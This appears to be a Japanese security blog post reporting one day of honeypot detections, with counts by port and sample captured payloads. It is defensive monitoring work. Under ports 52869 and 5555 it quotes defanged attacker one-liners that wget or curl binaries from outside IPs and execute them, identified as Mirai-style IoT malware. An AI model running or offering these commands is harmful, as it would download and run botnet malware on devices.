sec-chick Blog

サイバーセキュリティブログ

ハニーポット分析(8日目:8/15)

8日目(8/15)のハニーポット分析結果です。

Honeypot検知数:
9,394 件 (内、ペイロード有 4,321 件)
<宛先ポート別検知数 TOP10>

宛先ポート サービス 検知数 割合 攻撃概要
445 SMB 1,686 39.02% 調査行為
3389 RDP 1,176 27.22% 調査行為
22 SSH 62 1.44% 調査行為
1433 Microsoft SQL Server 58 1.34% 調査行為
8088 Asterisk (PBX) Web Configuration utility  47 1.09% 調査行為
443 HTTPS 46 1.06% 暗号化
52869 D-Link, Realtek SDK 39 0.90% マルウェアダウンロード
5555 Android Debug Bridge (ADB) 37 0.86% マルウェアダウンロード
8080 PROXY 37 0.86% 調査行為
6379 Redis 35 0.81% 調査行為

 

ペイロード例>

445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12

3389ポート:
Cookie: mstshash=hello

22ポート:
SSH-2.0-libssh2_1.4.3

1433ポート:
SERVERsaOSQL-32160.16.145.183ODBC

8088ポート:
GET /conf

52869ポート:
POST /picsdesc[.]xml hxxp/1[.]1

コマンド一覧
cd /tmp/;wget hxxp[:]//107[.]191[.]99[.]41/elf[.]mips -O elf
cd /tmp/;wget hxxp[:]//178[.]128[.]145[.]32/sora[.]mips -O sora
cd /tmp/;wget hxxp[:]//80[.]211[.]53[.]179/bins/gemini[.]mips
cd /var/; wget hxxp[:]//198[.]12[.]97[.]81/mips -O bt; chmod +x bt; [.]/bt mips
cd /var/; wget hxxp[:]//212[.]237[.]32[.]62/mips -O am; chmod +x am; [.]/am mips
→ IoT を狙ったマルウェア(Mirai系)

5555ポート:
shell[:]cd /data/local/tmp;wget hxxp[:]//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp[:]//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp[:]//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp[:]//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c
→ IoT を狙ったマルウェア(Mirai系)

8080ポート:
GET /

6379ポート:
PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12

 

SSH宛は調査行為止まりとなっており、実際にどのようなコマンドが打たれるかはハニーポット Cowrie を入れる必要があるかなと思いました。
Suricataの導入も検討しており、順次導入して分析の幅を広めていければと思います。

以上、ハニーポットの分析結果でした。